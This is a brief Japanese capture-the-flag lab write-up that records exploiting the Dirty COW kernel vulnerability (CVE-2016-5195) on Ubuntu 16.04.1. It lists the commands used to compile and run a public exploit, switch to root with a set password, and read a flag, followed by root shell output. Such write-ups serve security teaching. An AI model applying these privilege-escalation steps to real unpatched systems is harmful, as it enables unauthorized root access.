
Ubuntu 16.04.1 における Dirty COW (CVE-2016-5195) 脆弱性の悪用。
cat > README.md <<'EOF'
このラボは、脆弱なカーネルを持つ Ubuntu Server 16.04.1 システム上での Dirty COW 脆弱性の悪用を実演します。
目標は、制限付きユーザー (student) から root への権限昇格と、/root/flag.txt にあるフラグの取得でした。
Linux 4.4.0-31-generic (脆弱)。ubuntu:16.04 内の Kali で dirtycow_passwd.c をコンパイルし、バイナリ dirty を作成。scp dirty student@<IP>:~/。chmod +x ~/dirty && ~/dirty → su root (パスワード dirtyCowFun)。cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}。root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
取得したフラグ